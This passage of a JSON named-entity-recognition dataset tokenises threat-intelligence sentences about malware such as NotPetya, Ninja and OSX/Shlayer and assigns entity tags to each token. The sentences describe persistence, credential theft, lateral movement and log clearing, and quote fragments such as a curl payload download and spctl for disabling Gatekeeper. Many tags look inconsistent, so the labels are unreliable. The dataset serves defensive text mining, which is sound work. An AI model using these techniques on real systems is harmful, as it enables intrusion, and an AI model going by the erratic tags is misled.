- "tokens": [ - "NightClub", - "can", - "modify", - "the", - "Registry", - "to", - "set", - "the", - "ServiceDLL", - "for", - "a", - "service", - "created", - "by", - "the", - "malware", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NightClub", - "can", - "use", - "multiple", - "native", - "APIs", - "including", - "`GetKeyState`,", - "`GetForegroundWindow`,", - "`GetWindowThreadProcessId`,", - "and", - "`GetKeyboardLayout`." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Way", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "NightClub", - "has", - "used", - "a", - "non-standard", - "encoding", - "in", - "DNS", - "tunneling", - "removing", - "any", - "`=`", - "from", - "the", - "result", - "of", - "base64", - "encoding,", - "and", - "replacing", - "`/`", - "characters", - "with", - "`-s`", - "and", - "`+`", - "characters", - "with", - "`-p`." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "NightClub", - "can", - "obfuscate", - "strings", - "using", - "the", - "congruential", - "generator", - "`(LCG):", - "staten+1", - "=", - "(690069", - "×", - "staten", - "+", - "1)", - "mod", - "232`." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NightClub", - "has", - "the", - "ability", - "to", - "monitor", - "removable", - "drives." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "NightClub", - "has", - "the", - "ability", - "to", - "use", - "`GetWindowThreadProcessId`", - "to", - "identify", - "the", - "process", - "behind", - "a", - "specified", - "window." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NightClub", - "can", - "load", - "a", - "module", - "to", - "call", - "`CreateCompatibleDC`", - "and", - "`GdipSaveImageToStream`", - "for", - "screen", - "capture." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NightClub", - "can", - "modify", - "the", - "Creation,", - "Access,", - "and", - "Write", - "timestamps", - "for", - "malicious", - "DLLs", - "to", - "match", - "those", - "of", - "the", - "genuine", - "Windows", - "DLL", - "user32.dll." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "B-Features", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "NightClub", - "has", - "created", - "a", - "Windows", - "service", - "named", - "`WmdmPmSp`", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ninja", - "loaders", - "can", - "be", - "side-loaded", - "with", - "legitimate", - "and", - "signed", - "executables", - "including", - "the", - "VLC.exe", - "media", - "player." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "Ninja", - "has", - "the", - "ability", - "to", - "modify", - "headers", - "and", - "URL", - "paths", - "to", - "hide", - "malicious", - "traffic", - "in", - "HTTP", - "requests." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "B-HackOrg", - "B-Features", - "O", - "I-Purp", - "O", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Ninja", - "loader", - "component", - "can", - "decrypt", - "and", - "decompress", - "the", - "payload." - ], - "ner_tags": [ - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "B-Features", - "O", - "B-HackOrg", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "The", - "Ninja", - "payload", - "is", - "XOR", - "encrypted", - "and", - "compressed.", - "Ninja", - "has", - "also", - "XORed", - "its", - "configuration", - "data", - "with", - "a", - "constant", - "value", - "of", - "`0xAA`", - "and", - "compressed", - "it", - "with", - "the", - "LZSS", - "algorithm." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ninja", - "can", - "store", - "its", - "final", - "payload", - "in", - "the", - "Registry", - "under", - "`$HKLM\\SOFTWARE\\Classes\\Interface\\`", - "encrypted", - "with", - "a", - "dynamically", - "generated", - "key", - "based", - "on", - "the", - "drive’s", - "serial", - "number." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ninja", - "has", - "the", - "ability", - "to", - "enumerate", - "directory", - "content." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Ninja", - "can", - "use", - "pipes", - "to", - "redirect", - "the", - "standard", - "input", - "and", - "the", - "standard", - "output." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ninja", - "can", - "proxy", - "C2", - "communications", - "including", - "to", - "and", - "from", - "internal", - "agents", - "without", - "internet", - "connectivity." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ninja", - "has", - "gained", - "execution", - "through", - "victims", - "opening", - "malicious", - "executable", - "files", - "embedded", - "in", - "zip", - "archives." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ninja", - "has", - "used", - "legitimate", - "looking", - "filenames", - "for", - "its", - "loader", - "including", - "update.dll", - "and", - "x64.dll." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Ninja", - "has", - "the", - "ability", - "to", - "use", - "a", - "proxy", - "chain", - "with", - "up", - "to", - "255", - "hops", - "when", - "using", - "TCP." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "The", - "Ninja", - "loader", - "can", - "call", - "Windows", - "APIs", - "for", - "discovery,", - "process", - "injection,", - "and", - "payload", - "decryption." - ], - "ner_tags": [ - "O", - "I-SamFile", - "B-SecTeam", - "O", - "O", - "B-Features", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Ninja", - "can", - "forward", - "TCP", - "packets", - "between", - "the", - "C2", - "and", - "a", - "remote", - "host." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ninja", - "can", - "encode", - "C2", - "communications", - "with", - "a", - "base64", - "algorithm", - "using", - "a", - "custom", - "alphabet." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Ninja", - "can", - "enumerate", - "processes", - "on", - "a", - "targeted", - "host." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Purp", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ninja", - "has", - "the", - "ability", - "to", - "inject", - "an", - "agent", - "module", - "into", - "a", - "new", - "process", - "and", - "arbitrary", - "shellcode", - "into", - "running", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ninja", - "has", - "the", - "ability", - "to", - "mimic", - "legitimate", - "services", - "with", - "customized", - "HTTP", - "URL", - "paths", - "and", - "headers", - "to", - "hide", - "malicious", - "traffic." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Ninja", - "loader", - "components", - "can", - "be", - "executed", - "through", - "rundll32.exe." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Ninja", - "can", - "configure", - "its", - "agent", - "to", - "work", - "only", - "in", - "specific", - "time", - "frames." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ninja", - "has", - "been", - "distributed", - "to", - "victims", - "via", - "the", - "messaging", - "app", - "Telegram." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ninja", - "can", - "XOR", - "and", - "AES", - "encrypt", - "C2", - "messages." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ninja", - "can", - "obtain", - "the", - "computer", - "name", - "and", - "information", - "on", - "the", - "OS", - "and", - "physical", - "drives", - "from", - "targeted", - "hosts." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ninja", - "can", - "enumerate", - "the", - "IP", - "address", - "on", - "compromised", - "systems." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-SamFile", - "O", - "O", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ninja", - "can", - "change", - "or", - "create", - "the", - "last", - "access", - "or", - "write", - "times." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ninja", - "can", - "use", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ninja", - "can", - "create", - "the", - "services", - "`httpsvc`", - "and", - "`w3esvc`", - "for", - "persistence", - "." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Nltest", - "may", - "be", - "used", - "to", - "enumerate", - "trusted", - "domains", - "by", - "using", - "commands", - "such", - "as", - "<code>nltest", - "/domain_trusts</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Nltest", - "may", - "be", - "used", - "to", - "enumerate", - "remote", - "domain", - "controllers", - "using", - "options", - "such", - "as", - "<code>/dclist</code>", - "and", - "<code>/dsgetdc</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Purp", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Nltest", - "may", - "be", - "used", - "to", - "enumerate", - "the", - "parent", - "domain", - "of", - "a", - "local", - "machine", - "using", - "<code>/parentdomain</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NotPetya", - "uses", - "<code>wevtutil</code>", - "to", - "clear", - "the", - "Windows", - "event", - "logs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NotPetya", - "encrypts", - "user", - "files", - "and", - "disk", - "structures", - "like", - "the", - "MBR", - "with", - "2048-bit", - "RSA." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NotPetya", - "can", - "use", - "two", - "exploits", - "in", - "SMBv1,", - "EternalBlue", - "and", - "EternalRomance,", - "to", - "spread", - "itself", - "to", - "other", - "remote", - "systems", - "on", - "the", - "network." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NotPetya", - "searches", - "for", - "files", - "ending", - "with", - "dozens", - "of", - "different", - "file", - "extensions", - "prior", - "to", - "encryption." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NotPetya", - "contains", - "a", - "modified", - "version", - "of", - "Mimikatz", - "to", - "help", - "gather", - "credentials", - "that", - "are", - "later", - "used", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NotPetya", - "can", - "use", - "valid", - "credentials", - "with", - "PsExec", - "or", - "<code>wmic</code>", - "to", - "spread", - "itself", - "to", - "remote", - "systems." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NotPetya", - "drops", - "PsExec", - "with", - "the", - "filename", - "dllhost.dat." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "NotPetya", - "uses", - "<code>rundll32.exe</code>", - "to", - "install", - "itself", - "on", - "remote", - "systems", - "when", - "accessed", - "via", - "PsExec", - "or", - "<code>wmic</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "NotPetya", - "can", - "use", - "PsExec,", - "which", - "interacts", - "with", - "the", - "<code>ADMIN$</code>", - "network", - "share", - "to", - "execute", - "commands", - "on", - "remote", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NotPetya", - "creates", - "a", - "task", - "to", - "reboot", - "the", - "system", - "one", - "hour", - "after", - "infection." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NotPetya", - "determines", - "if", - "specific", - "antivirus", - "programs", - "are", - "running", - "on", - "an", - "infected", - "host", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NotPetya", - "can", - "use", - "PsExec", - "to", - "help", - "propagate", - "itself", - "across", - "a", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NotPetya", - "will", - "reboot", - "the", - "system", - "one", - "hour", - "after", - "infection." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NotPetya", - "can", - "use", - "<code>wmic</code>", - "to", - "help", - "propagate", - "itself", - "across", - "a", - "network." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OLDBAIT", - "collects", - "credentials", - "from", - "several", - "email", - "clients." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OLDBAIT", - "collects", - "credentials", - "from", - "Internet", - "Explorer,", - "Mozilla", - "Firefox,", - "and", - "Eudora." - ], - "ner_tags": [ - "B-Idus", - "I-Features", - "I-Features", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "OLDBAIT", - "can", - "use", - "SMTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "OLDBAIT", - "installs", - "itself", - "in", - "<code>%ALLUSERPROFILE%\\\\Application", - "Data\\Microsoft\\MediaPlayer\\updatewindws.exe</code>;", - "the", - "directory", - "name", - "is", - "missing", - "a", - "space", - "and", - "the", - "file", - "name", - "is", - "missing", - "the", - "letter", - "\"o.\"" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OLDBAIT", - "obfuscates", - "internal", - "strings", - "and", - "unpacks", - "them", - "at", - "startup." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OLDBAIT", - "can", - "use", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "OSInfo", - "enumerates", - "local", - "and", - "domain", - "users" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSInfo", - "specifically", - "looks", - "for", - "Domain", - "Admins", - "and", - "power", - "users", - "within", - "the", - "domain." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "B-Purp", - "O", - "B-Purp", - "B-Org", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSInfo", - "enumerates", - "local", - "and", - "domain", - "users" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSInfo", - "has", - "enumerated", - "the", - "local", - "administrators", - "group." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSInfo", - "discovers", - "shares", - "on", - "the", - "network" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSInfo", - "queries", - "the", - "registry", - "to", - "look", - "for", - "information", - "about", - "Terminal", - "Services." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSInfo", - "performs", - "a", - "connection", - "test", - "to", - "discover", - "remote", - "systems", - "in", - "the", - "network" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSInfo", - "discovers", - "information", - "about", - "the", - "infected", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSInfo", - "discovers", - "the", - "current", - "domain", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSInfo", - "enumerates", - "the", - "current", - "network", - "connections", - "similar", - "to", - "<code>", - "net", - "use", - "</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX/Shlayer", - "can", - "install", - "malicious", - "Safari", - "browser", - "extensions", - "to", - "serve", - "ads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX/Shlayer", - "can", - "base64-decode", - "and", - "AES-decrypt", - "downloaded", - "payloads.", - "Versions", - "of", - "OSX/Shlayer", - "pass", - "encrypted", - "and", - "password-protected", - "code", - "to", - "<code>openssl</code>", - "and", - "then", - "write", - "the", - "payload", - "to", - "the", - "<code>/tmp</code>", - "folder." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "OSX/Shlayer", - "can", - "escalate", - "privileges", - "to", - "root", - "by", - "asking", - "the", - "user", - "for", - "credentials." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX/Shlayer", - "has", - "used", - "the", - "command", - "<code>appDir=\"$(dirname", - "$(dirname", - "\"$currentDir\"))\"</code>", - "and", - "<code>$(dirname", - "\"$(pwd", - "-P)\")</code>", - "to", - "construct", - "installation", - "paths." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "If", - "running", - "with", - "elevated", - "privileges,", - "OSX/Shlayer", - "has", - "used", - "the", - "<code>spctl</code>", - "command", - "to", - "disable", - "Gatekeeper", - "protection", - "for", - "a", - "downloaded", - "file.", - "OSX/Shlayer", - "can", - "also", - "leverage", - "system", - "links", - "pointing", - "to", - "bash", - "scripts", - "in", - "the", - "downloaded", - "DMG", - "file", - "to", - "bypass", - "Gatekeeper,", - "a", - "flaw", - "patched", - "in", - "macOS", - "11.3", - "and", - "later", - "versions.", - "OSX/Shlayer", - "has", - "been", - "Notarized", - "by", - "Apple,", - "resulting", - "in", - "successful", - "passing", - "of", - "additional", - "Gatekeeper", - "checks." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX/Shlayer", - "has", - "executed", - "a", - ".command", - "script", - "from", - "a", - "hidden", - "directory", - "in", - "a", - "mounted", - "DMG." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX/Shlayer", - "has", - "used", - "the", - "<code>mktemp</code>", - "utility", - "to", - "make", - "random", - "and", - "unique", - "filenames", - "for", - "payloads,", - "such", - "as", - "<code>export", - "tmpDir=\"$(mktemp", - "-d", - "/tmp/XXXXXXXXXXXX)\"</code>", - "or", - "<code>mktemp", - "-t", - "Installer</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "OSX/Shlayer", - "has", - "used", - "the", - "`nohup`", - "command", - "to", - "instruct", - "executed", - "payloads", - "to", - "ignore", - "hangup", - "signals." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX/Shlayer", - "can", - "download", - "payloads,", - "and", - "extract", - "bytes", - "from", - "files.", - "OSX/Shlayer", - "uses", - "the", - "<code>curl", - "-fsL", - "\"$url\"", - ">$tmp_path</code>", - "command", - "to", - "download", - "malicious", - "payloads", - "into", - "a", - "temporary", - "directory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX/Shlayer", - "can", - "use", - "the", - "<code>chmod</code>", - "utility", - "to", - "set", - "a", - "file", - "as", - "executable,", - "such", - "as", - "<code>chmod", - "777</code>", - "or", - "<code>chmod", - "+x</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX/Shlayer", - "has", - "relied", - "on", - "users", - "mounting", - "and", - "executing", - "a", - "malicious", - "DMG", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX/Shlayer", - "can", - "masquerade", - "as", - "a", - "Flash", - "Player", - "update." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX/Shlayer", - "has", - "used", - "a", - "resource", - "fork", - "to", - "hide", - "a", - "compressed", - "binary", - "file", - "of", - "itself", - "from", - "the", - "terminal,", - "Finder,", - "and", - "potentially", - "evade", - "traditional", - "scanners." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX/Shlayer", - "has", - "collected", - "the", - "IOPlatformUUID,", - "session", - "UID,", - "and", - "the", - "OS", - "version", - "using", - "the", - "command", - "<code>sw_vers", - "-productVersion</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "OSX/Shlayer", - "can", - "use", - "bash", - "scripts", - "to", - "check", - "the", - "macOS", - "version,", - "download", - "payloads,", - "and", - "extract", - "bytes", - "from", - "files.", - "OSX/Shlayer", - "uses", - "the", - "command", - "<code>sh", - "-c", - "tail", - "-c", - "+1381...</code>", - "to", - "extract", - "bytes", - "at", - "an", - "offset", - "from", - "a", - "specified", - "file.", - "OSX/Shlayer", - "uses", - "the", - "<code>curl", - "-fsL", - "\"$url\"", - ">$tmp_path</code>", - "command", - "to", - "download", - "malicious", - "payloads", - "into", - "a", - "temporary", - "directory." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "B-Features", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-SamFile", - "B-Way", - "B-SamFile", - "B-SamFile", - "O", - "O", - "I-Features", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "has", - "used", - "AES", - "in", - "CBC", - "mode", - "to", - "encrypt", - "collected", - "data", - "when", - "saving", - "that", - "data", - "to", - "disk." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "scrambles", - "and", - "encrypts", - "data", - "using", - "AES256", 